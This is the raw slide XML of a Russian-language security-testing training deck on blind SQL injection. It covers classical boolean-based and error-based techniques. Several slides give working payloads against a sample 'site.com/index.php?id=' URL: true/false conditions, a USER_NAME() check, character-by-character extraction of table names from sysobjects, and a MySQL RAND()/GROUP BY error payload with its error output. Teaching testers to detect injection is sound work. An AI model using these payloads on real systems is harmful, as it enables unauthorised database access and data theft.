            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Невозможен</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Способ обнаружения: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Посимвольный перебор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400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Select title, page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>From Pages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Where Pages.id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>2;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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056109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Обнаружение уязвимости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400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>=2’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>‘1’ = ‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>’—</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Select title, page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>From Pages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Where Pages.id = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND 1=1;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>=2’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>‘1’=‘2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>’—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Select title, page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>From Pages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Where Pages.id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1=2;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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935051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Эксплуатация уязвимости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lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=2’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>USER_NAME() = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Admin‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=2’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>(lower(substring((SELECT TOP 1 name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>='U'), 1, 1))) &gt; 109</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900"/>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" i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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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421287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Тестирование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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Проверка корректной обработки истинных и ложных запросов</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Проверка со значениями подобранными для существующих пользователей и имен таблиц</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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872725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Error Based Injection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b="1" dirty="0"/>
              <a:t>Вывод информации на экран: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>В сообщениях об ошибках</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0"/>
              <a:t>Способ обнаружения: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Использование готовых техник для конкретных баз данных</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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021179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Способ обнаружения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457200" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i="1" dirty="0"/>
              <a:t>=2’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="1" dirty="0"/>
              <a:t>OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="3" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2300" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>При наличии уязвимости приложение вернет ошибку:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Duplicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>entry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0"/>
              <a:t> '5.0.45' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" i="1" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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581062208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Office Theme">
      <a:majorFont>
        <a:latin typeface="Verdana"/>
        <a:ea typeface="Verdana"/>
        <a:cs typeface="Verdana"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial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892</TotalTime>
  <Words>421</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>111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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>Слепые SQL инъекции.</vt:lpstr>
      <vt:lpstr>Архитектура уязвимости</vt:lpstr>
      <vt:lpstr>Условия возникновения уязвимости</vt:lpstr>
      <vt:lpstr>Classical Injection</vt:lpstr>
      <vt:lpstr>Обнаружение уязвимости</vt:lpstr>
      <vt:lpstr>Эксплуатация уязвимости</vt:lpstr>
      <vt:lpstr>Тестирование</vt:lpstr>
      <vt:lpstr>Error Based Injection</vt:lpstr>
      <vt:lpstr>Способ обнаружения</vt:lpstr>
      <vt:lpstr>Запросы для других баз данных</vt:lpstr>
      <vt:lpstr>Тестирование</vt:lpstr>
      <vt:lpstr>Double Blind Injections</vt:lpstr>
      <vt:lpstr>Техники эксплуатации</vt:lpstr>
      <vt:lpstr>Техники эксплуатации</vt:lpstr>
      <vt:lpstr>Тестирование</vt:lpstr>
      <vt:lpstr>Программы для поиска уязвимостей</vt:lpstr>
      <vt:lpstr>Заключение</vt:lpstr>
      <vt:lpstr>Вопросы</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>УЦ Люксофт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тестированием. Анализ типичных проблем</dc:title>
  <dc:creator>Александр Александров</dc:creator>
  <cp:lastModifiedBy>Igor Bondarenko</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-04-02T17:11:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-06T11:10:12Z</dcterms:modified>
</cp:coreProperties>
</file>